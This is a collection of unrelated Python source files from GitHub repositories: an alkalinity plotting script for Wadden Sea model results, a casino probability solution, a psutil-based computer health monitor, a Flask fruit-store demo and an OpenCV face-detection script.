1)).total_seconds()\n\n\ndef addband(longitude):\n if 6.95 < longitude < 7:\n return 1\n else:\n return 0\n\n\ndef addphase(seconds):\n period = (12 * 60 * 60) + (25.2 * 60)\n half_period = period / 2\n startphase = (half_period / 12) * 8\n modulus = (seconds - startphase) % period\n if modulus < half_period:\n return 'low'\n else:\n return 'high'\n\n\ndef addphase_2(slev):\n if slev > 0:\n return 'high'\n else:\n return 'low'\n\n\ndef commafix(string):\n return float(string.replace(',', '.'))\n\n\ndef calculateTA(method, t, s):\n if method == 'Bellerby':\n if s >= 34.65:\n return 66.96 * s - 36.803 # Bellerby & Canoba\n else:\n return 3887 - 46.25 * s # Borges & Frankignoulle & Canoba\n elif method == 'Millero':\n if t < 20:\n return (s / 35 * (2291 - 2.69 * (t - 20)\n - 0.046 * np.square(t - 20)))\n else:\n return 520.1 + 51.24 * s # Millero et al, MarChem, 1998\n\n\ndef treatlvl(sealvldata):\n sealvldata['Seconds_since_start_of_the_year'] \\\n = sealvldata.TIME.map(addsecondstolvl)\n try:\n sealvldata['SLEV'] = sealvldata.SLEV.map(commafix)\n except AttributeError:\n pass\n sealvldata = sealvldata[sealvldata.SLEV.values[:] != -999]\n sealvldata['Phase'] = sealvldata.SLEV.map(addphase_2)\n return sealvldata\n\n\ndef treatbiogeodata(biogeodata):\n \"\"\"Process the data\"\"\"\n biogeodata['Season'] = biogeodata.Datetime.map(addseason)\n biogeodata['Month'] = biogeodata.Datetime.map(addmonth)\n biogeodata['Seconds_since_start_of_the_year'] \\\n = biogeodata.Datetime.map(addseconds)\n biogeodata['TAfromS'] = [calculateTA('Millero', t, s)\n for t, s in zip(biogeodata.Temperature.values,\n biogeodata.Salinity.values)]\n return biogeodata\n\n\ndef addlvlphase(biogeodata, sealvldata):\n \"\"\"Biogeodata and sealvldata for the current month\"\"\"\n biogeodata['SLEV'] \\\n = [np.interp(x,\n sealvldata.Seconds_since_start_of_the_year.values,\n sealvldata.SLEV.values)\n for x in biogeodata.Seconds_since_start_of_the_year.values]\n biogeodata['Phase'] = biogeodata.SLEV.map(addphase_2)\n return biogeodata\n\n\ndef returndate(datestring):\n return datetime.strptime(datestring, \"%Y-%m-%d %H:%M:%S\")\n\n\ndef cm2inch(*tupl):\n inch = 2.54\n if isinstance(tupl[0], tuple):\n return tuple(i/inch for i in tupl[0])\n else:\n return tuple(i/inch for i in tupl)\n\n\ndef plotTA(biogeodata):\n fig, ax = plt.subplots(figsize=(12, 5), constrained_layout=True)\n Time = biogeodata.Datetime.map(returndate).values\n TA = biogeodata.TA.values\n TAfromS = biogeodata.TAfromS.values\n size = FNTSZ\n ax.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n ax.scatter(Time, TA, label='Total Alkalinity, measured', s=size)\n ax.scatter(Time, TAfromS,\n label='Total Alkalinity, calculated from salinity',\n s=size)\n for item in ([ax.title, ax.xaxis.label, ax.yaxis.label] +\n ax.get_xticklabels() + ax.get_yticklabels()):\n item.set_fontsize(FNTSZ)\n ax.legend(loc='upper left', fontsize=LGNDSZ)\n plt.ylabel('Total Alkalinity, $\\mu M$')\n plt.show()\n\n\ndef plot_intro():\n north7 = pd.read_csv(\"data/HafniaDataNorth7Shamil.csv\")\n north7 = treatbiogeodata(north7)\n plotTA(north7)\n\n\ndef get_data_time(dtsts):\n alk_year, alkflux_bottom_year = [], []\n\n for i, ds in enumerate((dtsts), start=0):\n alk_df = ds[ALK_VAR].to_dataframe()\n alkflux_df = ds[ALKFLUX_VAR].to_dataframe()\n alk = alk_df.groupby('z').get_group(0.625).reset_index('z', drop=True)\n alkflux_bottom = alkflux_df.groupby('z_faces').get_group(2.5)\n alkflux_bottom = alkflux_bottom.reset_index('z_faces', drop=True)\n\n alk_year.append(alk[START:STOP])\n alkflux_bottom_year.append(alkflux_bottom[START:STOP])\n alk_year[i] = alk_year[i].reset_index()\n alkflux_bottom_year[i] = alkflux_bottom_year[i].reset_index()\n alk_year[i][ALK_VAR] = alk_year[i][ALK_VAR]-alk_year[i][ALK_VAR].min()\n\n return alk_year, alkflux_bottom_year\n\n\ndef plot_alkalinity_flux_low_high():\n base_path = 'data/results'\n ds1 = xr.open_dataset('{}/2_po75-25_di1e-9/water.nc'.format(base_path))\n ds2 = xr.open_dataset('{}/3_po75-25_di2e-9/water.nc'.format(base_path))\n ds3 = xr.open_dataset('{}/4_po75-25_di5e-9/water.nc'.format(base_path))\n ds4 = xr.open_dataset('{}/5_po75-25_di10e-9/water.nc'.format(base_path))\n ds5 = xr.open_dataset('{}/6_po75-25_di15e-9/water.nc'.format(base_path))\n ds6 = xr.open_dataset('{}/7_po75-25_di20e-9/water.nc'.format(base_path))\n ds7 = xr.open_dataset('{}/8_po75-25_di25e-9/water.nc'.format(base_path))\n ds8 = xr.open_dataset('{}/9_po75-25_di30e-9/water.nc'.format(base_path))\n ds9 = xr.open_dataset('{}/10_po75-25_di35e-9/water.nc'.format(base_path))\n\n alk_year, alkflux_bottom_year = get_data_time([ds1, ds2, ds3, ds4, ds5,\n ds6, ds7, ds8, ds9])\n\n fig = plt.figure(figsize=(12, 10))\n ax = fig.add_subplot(2, 1, 1)\n ax1 = fig.add_subplot(2, 1, 2)\n\n labels = [r'$1e-9$', r'$2e-9$', r'$5e-9$', r'$10e-9$', r'$15e-9$',\n r'$20e-9$', r'$25e-9$', r'$30e-9$', r'$35e-9$']\n\n for n in range(0, 9):\n ax.plot(alkflux_bottom_year[n]['time'],\n alkflux_bottom_year[n][ALKFLUX_VAR],\n linewidth=LNW, label=labels[n])\n ax1.plot(alk_year[n]['time'], alk_year[n][ALK_VAR],\n linewidth=LNW, label=labels[n])\n\n ax.set_ylabel('TA fluxes, mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n ax1.set_ylabel('Relative TA, mmol m$^{-3}$', fontsize=FNTSZ)\n ax.legend(loc='best', title='$kz_{dispersion}$, m$^2$ s$^{-1}$',\n fontsize=LGNDSZ, title_fontsize=LGNDSZ)\n\n labels = ('(A) ', '(B)')\n for i, axis in enumerate((ax, ax1)):\n axis.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n axis.text(X_TEXT, Y_TEXT, labels[i], transform=axis.transAxes,\n fontsize=FNTSZ, fontweight='bold', va='top', ha='right')\n plt.show()\n\n\ndef plot_alkalinity_flux_sulfur_oxidation():\n\n ds0 = xr.open_dataset('data/different_sulfur_oxidation/high/water.nc')\n ds1 = xr.open_dataset('data/different_sulfur_oxidation/low/water.nc')\n ds2 = xr.open_dataset('data/different_sulfur_oxidation/regular/water.nc')\n\n alk_year, alkflux_bottom_year = get_data_time([ds0, ds1, ds2])\n\n fig = plt.figure(figsize=cm2inch(30, 10))\n ax = fig.add_subplot(1, 2, 1)\n ax1 = fig.add_subplot(1, 2, 2)\n\n labels = ['high', 'low', 'base']\n for n in range(0, 3):\n ax.plot(alkflux_bottom_year[n]['time'],\n alkflux_bottom_year[n][ALKFLUX_VAR],\n linewidth=LNW, label=labels[n])\n ax1.plot(alk_year[n]['time'], alk_year[n][ALK_VAR],\n linewidth=LNW, label=labels[n])\n\n ax.set_ylabel('mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n ax.set_title('TA fluxes', fontsize=FNTSZ)\n ax1.set_ylabel('mmol m$^{-3}$', fontsize=FNTSZ)\n ax1.set_title('Relative Total Alkalinity', fontsize=FNTSZ)\n\n labels = ('(A) ', '(B)')\n for i, axis in enumerate((ax, ax1)):\n axis.text(X_TEXT, Y_TEXT, labels[i], transform=axis.transAxes,\n fontsize=FNTSZ, fontweight='bold', va='top', ha='right')\n axis.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n\n ax.legend(loc='upper left', title='Sulfur compounds \\noxidation rates',\n fontsize=LGNDSZ, title_fontsize=LGNDSZ)\n plt.show()\n\n\ndef plot_alkalinity_flux_porosities1_2_3():\n\n base_path = 'data/different_porosities'\n ds0 = xr.open_dataset('{}/4_po45-25_di10e-9/water.nc'.format(base_path))\n ds1 = xr.open_dataset('{}/0_po55-25_di10e-9/water.nc'.format(base_path))\n ds2 = xr.open_dataset('{}/1_po65-25_di10e-9/water.nc'.format(base_path))\n ds3 = xr.open_dataset('{}/2_po75-25_di10e-9/water.nc'.format(base_path))\n ds4 = xr.open_dataset('{}/3_po85-25_di10e-9/water.nc'.format(base_path))\n\n base_path = 'data/different_porosities_2'\n ds0_2 = xr.open_dataset('{}/0_po75-05_di10e-9/water.nc'.format(base_path))\n ds1_2 = xr.open_dataset('{}/1_po75-15_di10e-9/water.nc'.format(base_path))\n ds2_2 = xr.open_dataset('{}/2_po75-25_di10e-9/water.nc'.format(base_path))\n ds3_2 = xr.open_dataset('{}/3_po75-35_di10e-9/water.nc'.format(base_path))\n\n base_path = 'data/different_porosities_3'\n ds0_3 = xr.open_dataset('{}/0_po63-32_di10e-9/water.nc'.format(base_path))\n ds1_3 = xr.open_dataset('{}/1_po70-28_di10e-9/water.nc'.format(base_path))\n ds2_3 = xr.open_dataset('{}/2_po75-25_di10e-9/water.nc'.format(base_path))\n ds3_3 = xr.open_dataset('{}/3_po82-21_di10e-9/water.nc'.format(base_path))\n\n alk_year, alkflux_bottom_year = get_data_time([ds0, ds1, ds2, ds3, ds4])\n alk_year_2, alkflux_bottom_year_2 = get_data_time([ds0_2, ds1_2,\n ds2_2, ds3_2])\n alk_year_3, alkflux_bottom_year_3 = get_data_time([ds0_3, ds1_3,\n ds2_3, ds3_3])\n\n fig = plt.figure(figsize=(12, 10))\n ax = fig.add_subplot(3, 2, 1)\n ax1 = fig.add_subplot(3, 2, 2)\n ax_2 = fig.add_subplot(3, 2, 3)\n ax1_2 = fig.add_subplot(3, 2, 4)\n ax1_3 = fig.add_subplot(3, 2, 6)\n ax_3 = fig.add_subplot(3, 2, 5)\n\n labels = ('0.45-0.25', '0.55-0.25', '0.65-0.25', '0.75-0.25', '0.85-0.25')\n labels_2 = ('0.75-0.05', '0.75-0.15', '0.75-0.25', '0.75-0.35')\n labels_3 = ('0.63-0.32', '0.70-0.28', '0.75-0.25', '0.82-0.21')\n\n for n in range(0, 5):\n ax.plot(alkflux_bottom_year[n]['time'],\n alkflux_bottom_year[n]['B_C_Alk _flux'],\n linewidth=LNW, alpha=1, label=labels[n])\n ax1.plot(alk_year[n]['time'], alk_year[n]['B_C_Alk'],\n linewidth=LNW, label=labels[n])\n\n for n in range(0, 4):\n ax_2.plot(alkflux_bottom_year_2[n]['time'],\n alkflux_bottom_year_2[n]['B_C_Alk _flux'],\n linewidth=LNW, label=labels_2[n])\n ax1_2.plot(alk_year_2[n]['time'], alk_year_2[n]['B_C_Alk'],\n linewidth=LNW, label=labels_2[n])\n\n ax_3.plot(alkflux_bottom_year_3[n]['time'],\n alkflux_bottom_year_3[n]['B_C_Alk _flux'],\n linewidth=2, label=labels_3[n])\n ax1_3.plot(alk_year_3[n]['time'], alk_year_3[n]['B_C_Alk'],\n linewidth=LNW, label=labels_3[n])\n\n for axis in [ax, ax1, ax_2, ax1_2, ax_3, ax1_3]:\n axis.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n\n for axis in [ax, ax_2, ax_3]:\n axis.set_ylabel('mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n axis.set_ylim(0, 27)\n\n for axis in [ax1, ax1_2, ax1_3]:\n axis.set_ylabel('mmol m$^{-3}$', fontsize=FNTSZ)\n axis.legend(loc='upper left',\n title='Porosities:\\n SWI - \"infinite depth\"',\n fontsize=LGNDSZ, title_fontsize=LGNDSZ)\n axis.set_ylim(0, 180)\n ax.set_title('TA fluxes', fontsize=FNTSZ)\n ax1.set_title('Relative Total Alkalinity', fontsize=FNTSZ)\n\n labels = ('(A) ', '(B)', '(C) ', '(D)', '(E)', '(F)')\n for i, axis in enumerate((ax, ax1, ax_2, ax1_2, ax_3, ax1_3)):\n axis.text(X_TEXT, Y_TEXT, labels[i], transform=axis.transAxes,\n fontsize=FNTSZ, fontweight='bold', va='top', ha='right')\n plt.show()\n\n\ndef plot_alk_sulfur_fluxes():\n\n ds1 = xr.open_dataset('data/results/2_po75-25_di1e-9/water.nc')\n ds2 = xr.open_dataset('data/results/3_po75-25_di2e-9/water.nc')\n ds3 = xr.open_dataset('data/results/4_po75-25_di5e-9/water.nc')\n ds4 = xr.open_dataset('data/results/5_po75-25_di10e-9/water.nc')\n\n def get_var_data_time(dtsts, varname):\n varflux_bottom_july, var_mean = [], []\n for i, ds in enumerate(dtsts, start=0):\n varflux_df = ds[varname].to_dataframe()\n varflux_bottom = varflux_df.groupby('z_faces').get_group(2.5)\n varflux_bottom = varflux_bottom.reset_index('z_faces', drop=True)\n varflux_bottom_july.append(varflux_bottom['2011-07-01':\n '2011-08-01'])\n varflux_bottom_july[i] = varflux_bottom_july[i].reset_index()\n var_mean.append(varflux_bottom_july[i][varname].mean())\n return np.array(var_mean), varflux_bottom_july\n\n dtsts = [ds1, ds2, ds3, ds4]\n alk, alkflux_bottom_july = get_var_data_time(dtsts, 'B_C_Alk _flux')\n nh4, nh4flux_bottom_july = get_var_data_time(dtsts, 'B_NUT_NH4 _flux')\n no2, no2flux_bottom_july = get_var_data_time(dtsts, 'B_NUT_NO2 _flux')\n no3, no3flux_bottom_july = get_var_data_time(dtsts, 'B_NUT_NO3 _flux')\n po4, po4flux_bottom_july = get_var_data_time(dtsts, 'B_NUT_PO4 _flux')\n so4, so4flux_bottom_july = get_var_data_time(dtsts, 'B_S_SO4 _flux')\n h2s, h2sflux_bottom_july = get_var_data_time(dtsts, 'B_S_H2S _flux')\n s0, s0flux_bottom_july = get_var_data_time(dtsts, 'B_S_S0 _flux')\n s2o3, s2o3flux_july = get_var_data_time(dtsts, 'B_S_S2O3 _flux')\n s_total = h2s + s0 + 2*s2o3\n x = np.array([1e-9, 2e-9, 5e-9, 10e-9])\n\n fig = plt.figure(figsize=cm2inch(8.5, 6), constrained_layout=True)\n ax = fig.add_subplot(1, 1, 1)\n ax.plot(x, alk, linewidth=LNW, label=r'alkalinity flux')\n ax.plot(x, s_total, linewidth=LNW, label=r'sulfur flux')\n ax.set_ylim(0, 19)\n\n ax.set_ylabel('Flux, mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n ax.set_xlabel('$kz_{dispersion}$, m$^2$ s$^{-1}$', fontsize=FNTSZ)\n\n ax.legend(loc='upper left', title='Fluxes',\n fontsize=LGNDSZ, title_fontsize=LGNDSZ)\n plt.show()\n\n\ndef plot_caco3():\n\n ds = xr.open_dataset('data/results/5_po75-25_di10e-9/water.nc')\n\n alkflux_df = ds['B_C_Alk _flux'].to_dataframe()\n biogrow_df = ds['B_BIO_GrowthPhy'].to_dataframe()\n omresp_df = ds['B_BIO_DcPOM_O2'].to_dataframe()\n alk_df = ds['B_C_Alk'].to_dataframe()\n\n alkflux_bottom = alkflux_df.groupby('z_faces').get_group(2.5)\n alkflux_bottom = alkflux_bottom.reset_index('z_faces', drop=True)\n omresp_bottom = omresp_df.groupby('z').get_group(2.4749999046325684)\n omresp_bottom = omresp_bottom.reset_index('z', drop=True)\n biogrow_surfac = biogrow_df.groupby('z').get_group(0.625)\n biogrow_surfac = biogrow_surfac.reset_index('z', drop=True)\n alk_surface = alk_df.groupby('z').get_group(0.625)\n alk_surface = alk_surface.reset_index('z', drop=True)\n alk_surface_year = alk_surface[START:STOP].reset_index()\n\n year = (('2011-01-01', '2011-01-31'), ('2011-02-01', '2011-02-28'),\n ('2011-03-01', '2011-03-31'), ('2011-04-01', '2011-04-30'),\n ('2011-05-01', '2011-05-31'), ('2011-06-01', '2011-06-30'),\n ('2011-07-01', '2011-07-31'), ('2011-08-01', '2011-08-31'),\n ('2011-09-01', '2011-09-30'), ('2011-10-01', '2011-10-31'),\n ('2011-11-01', '2011-11-30'), ('2011-12-01', '2011-12-31'))\n\n year_days = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\n alk_year_delta = []\n alk_year = []\n bio_year = []\n res_year = []\n for month in year:\n alk_delta_month = alk_surface[month[0]:month[1]]\n alk_month = alkflux_bottom[month[0]:month[1]]\n bio_month = biogrow_surfac[month[0]:month[1]]\n res_month = omresp_bottom[month[0]:month[1]]\n alk_year_delta.append(alk_delta_month['B_C_Alk'][0])\n alk_year.append(alk_month['B_C_Alk _flux'].mean())\n bio_year.append(bio_month['B_BIO_GrowthPhy'].mean())\n res_year.append(res_month['B_BIO_DcPOM_O2'].mean())\n\n bio_year_quotas = np.array(bio_year)/sum(bio_year)\n res_year_quotas = np.array(res_year)/sum(res_year)\n caco3_precipitation = bio_year_quotas*1000/year_days\n caco3_dissolution = res_year_quotas*1000/year_days\n ca_flux = caco3_dissolution - caco3_precipitation\n ca_array = np.array(ca_flux)/2.5*2\n\n alk_array = np.array(alk_surface_year['B_C_Alk'])\n alkflux_bottom_year = alkflux_bottom[START:STOP].reset_index()\n\n calpart = np.zeros(365)\n day = 0\n last_entry = 0\n for month, increment in zip(year_days, ca_array):\n temp = np.linspace(last_entry+increment,\n last_entry+increment*month, num=month)\n calpart[day:day+month] = temp\n last_entry = temp[-1]\n day += month\n\n result_array = alk_array + calpart\n\n caco3_dis = np.zeros(365)\n day = 0\n for month, increment in zip(year_days, caco3_dissolution):\n caco3_dis[day:day+month] = increment\n day += month\n\n caco3_pre = np.zeros(365)\n day = 0\n for month, increment in zip(year_days, caco3_precipitation):\n caco3_pre[day:day+month] = increment\n day += month\n\n fig = plt.figure(figsize=(12, 10))\n ax1 = fig.add_subplot(2, 1, 1)\n ax2 = fig.add_subplot(2, 1, 2)\n\n ax1.xaxis_date()\n ax2.xaxis_date()\n ax1.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n ax2.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n\n ax1.plot(alk_surface_year['time'], caco3_dis*2,\n label='CaCO$_3$ dissolution')\n ax1.plot(alk_surface_year['time'], caco3_pre*2,\n label='CaCO$_3$ precipitation')\n ax1.plot(alk_surface_year['time'], alkflux_bottom_year['B_C_Alk _flux'],\n label='Modelled TA flux at the SWI')\n ax1.plot(alk_surface_year['time'],\n caco3_dis*2+alkflux_bottom_year['B_C_Alk _flux'], linewidth=2,\n label=r'CaCO$_3$ dissolution + TA flux at the SWI')\n ax1.set_ylabel('TA fluxes, mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n ax1.legend(fontsize=LGNDSZ, title_fontsize=LGNDSZ,\n loc=\"best\", borderaxespad=0)\n\n ax2.plot(alk_surface_year['time'], calpart-calpart.min(), linewidth=2,\n label=r'Due to CaCO$_3$ dissolution/precipitation')\n ax2.plot(alk_surface_year['time'], alk_array-alk_array.min(), linewidth=2,\n label=r'From the model calculations')\n ax2.plot(alk_surface_year['time'], result_array-result_array.min(),\n linewidth=2, label=r'CaCO$_3$ + model calculations')\n ax2.set_ylabel('Relative TA, mmol m$^{-3}$', fontsize=FNTSZ)\n ax2.legend(fontsize=LGNDSZ, title_fontsize=LGNDSZ,\n loc=\"best\", borderaxespad=0)\n\n labels = ('(A) ', '(B)')\n for i, axis in enumerate((ax1, ax2)):\n axis.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n axis.text(X_TEXT, Y_TEXT, labels[i], transform=axis.transAxes,\n fontsize=FNTSZ, fontweight='bold', va='top', ha='right')\n plt.show()\n\n\nif __name__ == \"__main__\":\n plot_intro()\n # plot_alkalinity_flux_low_high()\n # plot_alkalinity_flux_sulfur_oxidation()\n # plot_alkalinity_flux_porosities1_2_3()\n # plot_alk_sulfur_fluxes()\n # plot_caco3()\n","repo_name":"limash/Alkalinity_in_the_Wadden_Sea","sub_path":"src/prepared_plots.py","file_name":"prepared_plots.py","file_ext":"py","file_size_in_byte":20721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"30860822247","text":"from fractions import Fraction\n\ninfile = open(\"casino.in\", \"r\")\noutfile = open(\"casino.out\", \"w\")\n\nn, m, k, c, l = [int(x) for x in infile.readline().strip().split()]\nwheel = [[0 for i in range(26)] for j in range(n)]\nfor i in range(n):\n for v in infile.readline().strip():\n wheel[i][ord(v)-ord('A')] += 1\n\nans = 0\nfor i in range(c):\n s, pay = infile.readline().strip().split()\n pay = int(pay)\n cnt = 1\n for i in range(n):\n if s[i] == '*':\n cnt *= m\n else:\n cnt *= wheel[i][ord(s[i])-ord('A')]\n ans += Fraction(pay * cnt, m ** n)\n\nif ans > 1:\n ans -= 1\n outfile.write(\"{}/{}\\n\".format(ans.numerator, ans.denominator))\n outfile.write(\"{}\\n\".format(l))\n outfile.write(\"{}\\n\".format(\" \".join([str(x+1) for x in range(l)])))\nelse:\n outfile.write(\"0/1\\n\")\n outfile.write(\"0\\n\")\n\n\n","repo_name":"ehnryx/acm","sub_path":"asc19-cf100324/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"}
+{"seq_id":"9629243972","text":"# written by Lekhraj(USD) pandeylekhraj4447@gmail.com\n#importing libraries main library is psutil midas.client communicates with odb page \n\nimport psutil\nimport numpy as np\nimport os\nimport pytz\nfrom datetime import datetime\nfrom pytz import timezone\nimport midas.client\nimport socket\nimport json\nimport os.path\n\n#connecting my script to odb\nclient = midas.client.MidasClient(\"pytest\")\n\n#for getting time \ntz_Pac = pytz.timezone('US/Pacific')\ndatetime = datetime.now(tz_Pac)\ndatetime= datetime.strftime('%a %b %d %H:%M:%S %Z %Y')\n#print(datetime)\n#get hostname\nhostoutput= socket.gethostname()\nhostoutput=hostoutput.split('.')[0]\n#path inside midas client is path in the odb where the threshold comparable values comes from odb page\nODBTest=client.odb_get(\"/HealthMonitoring/ComputerMonitoring/ThresholdControl/\"+hostoutput+\"/ODB_Test_Value\")\nODB_test_variable=int(ODBTest)\nDiskSpaceThreshold=client.odb_get('/HealthMonitoring/ComputerMonitoring/ThresholdControl/'+hostoutput+'/NumDiskaboveTest_Value')\nMeanProcessorThreshold=client.odb_get('/HealthMonitoring/ComputerMonitoring/ThresholdControl/'+hostoutput+'/MeanCPUutilThreshold')\nMemThreshold=client.odb_get('/HealthMonitoring/ComputerMonitoring/ThresholdControl/'+hostoutput+'/MemUtilThreshold')\n\n\n\ndef disk_partition():\n\n ''' We are using library psutil and trying to get detail of disk partions. We are finding\n total number of partitions, maximum usgae and minimum usage. Also, we keep ODB_test_variable and try\n to get disk partion higher then ODB_test_variable\n\n '''\n \n num_of_partitions = 0\n higher_than_threshold = 0\n max_usage = 0\n min_usage =100\n #print('Threshold Percentage Value for Disk = {} % '.format(str(ODB_test_variable)))\n #templ = \"%-17s %8s %8s %8s %5s%% %9s %s\"\n #print(templ % (\"Device\", \"Total\", \"Used\", \"Free\", \"Use \", \"Type\",\n # \"Mount\"))\n templ=\"%-17s %5s%%\"\n filesystem=[]\n usedpercent=[]\n for part in psutil.disk_partitions(all=False):\n #print(os.name)\n if os.name == 'nt':\n if 'cdrom' in part.opts or part.fstype == '':\n # skip cd-rom drives with no disk in it; they may raise\n # ENOENT, pop-up a Windows GUI error for a non-ready\n # partition or just hang.\n continue\n usage = psutil.disk_usage(part.mountpoint)\n templ % (\n filesystem.append(part.device),\n usedpercent.append(usage.percent))\n\n # FreeListPer= list(map(lambda x: round(100 - x,2), usedpercent))\n # print(filesystem)\n # print(usedpercent)\n # print(FreeListPer)\n for values in usedpercent:\n #print(df3_df['filesystem'],values)\n values = float(values)\n #print(values)\n #converting string into float\n num_of_partitions += 1\n if values > max_usage:\n max_usage =values\n # print(max_usage)\n if values < min_usage:\n min_usage =values\n # print(min_usage)\n if values > ODB_test_variable:\n higher_than_threshold += 1\n if higher_than_threshold < 1:\n higher_than_threshold = 0\n return [num_of_partitions, max_usage, min_usage, higher_than_threshold]\n\n \ndef Processor_Utilization():\n\n ''' We are using library psutil and trying to get detail of num of CPU used and their respective\ncpu utilization percentage. We are keeping maximum,minumium cpu utilization and number of cpu in webpage\n '''\n\n num_CPUs = psutil.cpu_count()\n CPUsUtilization_percent = psutil.cpu_percent(interval=1,percpu=True)\n MeanValue=sum(CPUsUtilization_percent)/len(CPUsUtilization_percent)\n MeanValue=round(MeanValue,3)\n return[num_CPUs,CPUsUtilization_percent,MeanValue] \n\n\ndef MemoryUtilization():\n # print('\\n\\n********Memory Utilization*********\\n\\n')\n ''' We are using library psutil and trying to get detail of virtual and swap\n memory using psutil.virtual_memory() and psutil.swap_memory(). We are finding\n ntotal memory in GB by converting bytes into GB and we are finding Memory Utilization\n (total -avialable)*100/total in term of percentage in case both of RAM and Swap \n '''\n\n Memory= psutil.virtual_memory()\n SwapMemory= psutil.swap_memory()\n MemTot= round(Memory.total/(1024**3),2)\n SwapMemTot= round(SwapMemory.total/(1024**3),2)\n MemPercent= Memory.percent\n SwapMemPercent= SwapMemory.percent\n return [MemTot, SwapMemTot, MemPercent, SwapMemPercent]\n\n# values from processor utilization, disk Space Utilization & memoryutilization \n\nProcessor_=Processor_Utilization()\ndisk_=disk_partition()\nMemory_=MemoryUtilization()\n\njson1={'hostname':hostoutput,'DiskSpaceUtilization':{'LastRead':datetime,'nmDiskSpaceChk':disk_[0],'MaxDiskSpaceChk%':disk_[1],'MinDiskSpaceChk%':disk_[2],'nmGtrThreshold':disk_[3]},'ProcessorUtilization':{'LastRead':datetime,'nmCPUs':Processor_[0],'MaxCPUutilized%':max(Processor_[1]),'MinCPUutilized%':min(Processor_[1]),'MeanCPUutilized%':Processor_[2]},'MemoryUtilization':{'LastRead':datetime,'MemoryUsed%':Memory_[1],'MemTotinGB':Memory_[0],'SwapMemoryused%':Memory_[3],'SwapMemTotinGB':Memory_[2]},'Alarm':[hostoutput,ODB_test_variable,DiskSpaceThreshold,MeanProcessorThreshold,MemThreshold,disk_[3],Processor_[2],Memory_[1]]}\n#print(json1)\n#Pathwhere the code is running\n#PathJson= os.path.join(os.getcwd())\n#print(PathJson)\nPathJson=\"/home/cdms/health_monitoring/Computermonitoring/SystemHealthMonitor/FinalCompMonitoring\"\nout_file = open(str(PathJson)+\"/Json/\"+ str(hostoutput) +\".json\", \"w\")\njson.dump(json1, out_file)\n\nout_file.close()\n\n","repo_name":"pandeylekhraj/SystemHealthMonitor","sub_path":"FinalCompMonitoring/ReturnJsonFileCompMonitor.py","file_name":"ReturnJsonFileCompMonitor.py","file_ext":"py","file_size_in_byte":5566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"14062143390","text":"from flask import Flask, render_template, request, redirect\napp = Flask(__name__) \n\nimport time\n\n@app.route('/') \ndef index():\n return render_template(\"index.html\")\n\n@app.route('/checkout', methods=['POST']) \ndef checkout():\n strawberry = request.form[\"strawberry\"]\n raspberry = request.form[\"raspberry\"]\n blackberry = request.form[\"blackberry\"]\n apple = request.form[\"apple\"]\n fruits = {\"strawberry\":strawberry,\"raspberry\":raspberry,\"blackberry\":blackberry,\"apple\":apple}\n\n fname = request.form[\"first_name\"]\n lname = request.form[\"last_name\"]\n student_id = request.form[\"student_id\"]\n\n items = int(strawberry) + int(raspberry) + int(blackberry) + int(apple)\n\n localtime = time.asctime( time.localtime(time.time()) )\n\n return render_template(\"checkout.html\", fruits=fruits, fname=fname, lname=lname, student_id=student_id, items=items, localtime=localtime)\n\n@app.route('/fruits') \ndef fruits():\n fruits = [\"apple.png\", \"blackberry.png\", \"raspberry.png\", \"strawberry.png\"]\n return render_template(\"fruits.html\", fruits=fruits)\n\nif __name__==\"__main__\": \n app.run(debug=True) ","repo_name":"GustavoMonardez/python-flask-cd-fruit-store","sub_path":"fruit-store.py","file_name":"fruit-store.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"15636549356","text":"#! /usr/bin/env python\nimport cv2\nimport sys\n\ndef find_face_image():\n\t# image to analyze/Cascade for opencv to perform analysis\n\timagePath = \"YourImagePath\"\n \n \t# You need to download this xml file. It's necessary for the program to run\n\tcascPath = \"/YourPath/haarcascade_frontalface_default.xml\"\n\n\t# Read the image and convert to grayscale\n\timage = cv2.imread(imagePath)\n\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n\t# Create the haar cascade. Used for algorithm to find faces\n\tface_cascade = cv2.CascadeClassifier(cascPath)\n\n\t# Detect faces in the image\n\tfaces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\tfor (x,y,w,h) in faces:\n\t cv2.rectangle(image,(x,y),(x+w,y+h),(255,0,0),2)\n\t roi_gray = gray[y:y+h, x:x+w]\n\t roi_color = image[y:y+h, x:x+w]\n\n\t# Print out how many faces were found in the image\n\tprint(\"Found {0} faces!\".format(len(faces)))\n\n\t# Show the image with the selected faces. If user enters ESC key then exit program\n\twhile True:\n\t\tcv2.imshow(\"Faces found\", image)\n\t\t\n\t\tif cv2.waitKey(1) & 0xFF == 27:\n\t\t\tbreak\n\n\tcv2.destroyAllWindows()\n","repo_name":"spencerneveux/FacialRecognition","sub_path":"detect_face.py","file_name":"detect_face.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
